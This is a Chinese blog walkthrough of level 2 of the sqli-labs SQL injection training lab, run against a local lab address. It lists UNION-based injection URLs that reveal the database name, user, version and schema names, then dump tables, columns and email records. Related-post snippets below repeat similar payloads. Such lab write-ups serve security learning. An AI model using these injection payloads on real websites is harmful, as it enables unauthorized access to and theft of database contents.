sqli-labs-master【Less-2】

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量280 收藏
点赞数
分类专栏: 网络安全 文章标签: 安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44352521/article/details/103452676
版权

第二关来喽!!!
还是老样子,我们先查看后端代码:
在这里插入图片描述
可以看到,第二关的变量没有引号限制,当输入:

http://192.168.228.129/sqli-labs-master/Less-2/?id=1 --+

在这里插入图片描述
因为和第一关一样,所以第二关也是有3个字段,所以接下来我们直接爆库,同样采用union联合查询:

http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,database(),user()%20--+

在这里插入图片描述
我们还可以:

http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,@@datadir,version()%20--+

在这里插入图片描述
我们现在已经知道了数据库名字(security),另外,我们可以尝试来把所有的库名爆出来,如下:

http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(schema_name),null%20from%20information_schema.schemata%20--+

在这里插入图片描述
我们现在把重点主要放在爆破security这个库上,老规矩,爆出库名以后我们开始爆库里面的表:

http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(table_name),null%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

在这里插入图片描述
我们现在来爆emails表中的字段:

http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(column_name),null%20from%20information_schema.columns%20where%20table_name=%27emails%27%20--+

在这里插入图片描述
email表中有两个字段,然后我们来把这两个字段中的数据爆出来:

http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(id),group_concat(email_id)%20from%20emails%20--+

在这里插入图片描述
接着,我们在数据库中来查看对比数据是否一致:
在这里插入图片描述
可以看出,结果是一样的,如果想要爆其他库或者表的内容的话,可以参照上面的语句。
我自己也是刚开始学习安全的小白,以上内容如果有什么问题或者错误,欢迎大家纠正和提意见,大佬们勿喷/(ㄒoㄒ)/~~

TTRy_Harder
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之sqli-labs-master Less-2
luoshiyong123的博客
03-28 311
该关存储id形式为整形即id=1 所以直接order by得到列数 然后union爆破
sqli-labs-masterLess-2】解题过程
u010149713的博客
05-29 515
id=1 #1.正常显示 id=1' #2.错误回显 #You have an error in your SQL syntax; check the manual that corresponds to your MariaDB #server version for the right syntax to use near '' LIMIT 0,1' at line 1 #'' LIMIT...
sqli-labs-master/ Less-2记录
qq_45052704的博客
07-04 315
SQL注入学习记录
sqli-labs-less-2完整教程
yzcn
10-22 1577
Less-2 开始判断是否存在漏洞: http://127.0.0.1/sqli-labs-master/Less-2/?id=1 显示成功 http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ 显示失败,错误:’’ LIMIT 0,1’,表示在左边多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ --+ 进行注释后还是错误 http://127.0.0.1/sqli-labs-master
mysql less2_sqli-labs-master[Less-2]解题过程
weixin_29428137的博客
02-07 102
id=11.正常显示id=1'2.错误回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB #server version for the right syntax to use near '' LIMIT 0,1' at line 1'' LIMIT 0,1'表明:查询语...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
打穿sqli-labs靶场第二天(less-1,less-2)
qq_45741871的博客
04-07 318
打穿sqli-labs靶场第二天(less-1,less-2) 打开phpstudy,启动网站环境 通关less-1 浏览器访问靶场,选择第一关 进入靶场后发现靶场页面提示输入参数值 根据页面提示,参数名为id,使用GET方式传入参数值:http://127.0.0.1/sqli-labs-master/less-1/?id=1,按下回车后页面成功回显数据 测试是否存在注入,将传入的值1改为’,http://127.0.0.1/sqli-labs-master/Less-1/?id=‘,页面回显报错
sqli-labs-master靶场第二关详解
tangtang_888的博客
07-06 1755
1、点击进入sqli-labs-master靶场第二关Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
sql注入less2
Mdcq123的博客
10-15 234
http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union selcet 1,database(),3 http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union select 1,(select group_concat(table_name) from infor...
sqli-labs环境搭建
打代码的小女孩
03-02 1219
MySQL的相关函数: @@datadir 读取数据库路径 @@basedir MYSQL 获取安装路径 length(str):返回str字符串的长度。 substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始 mid(str,pos,len):跟上面的一样,截取字符串 ascii(str)...
Sqli-Labs-Master】Less1-4
Oavinci的博客
06-06 495
phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4 sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj Less-1 ?id=1'报错 ?id=1'%23 返回正常 ?id=1' order by 3%23 返回正常 ?id=1' orde...
Sqli-Labs之less-2
ISNS的博客
02-05 961
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1415
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 431
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 948
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值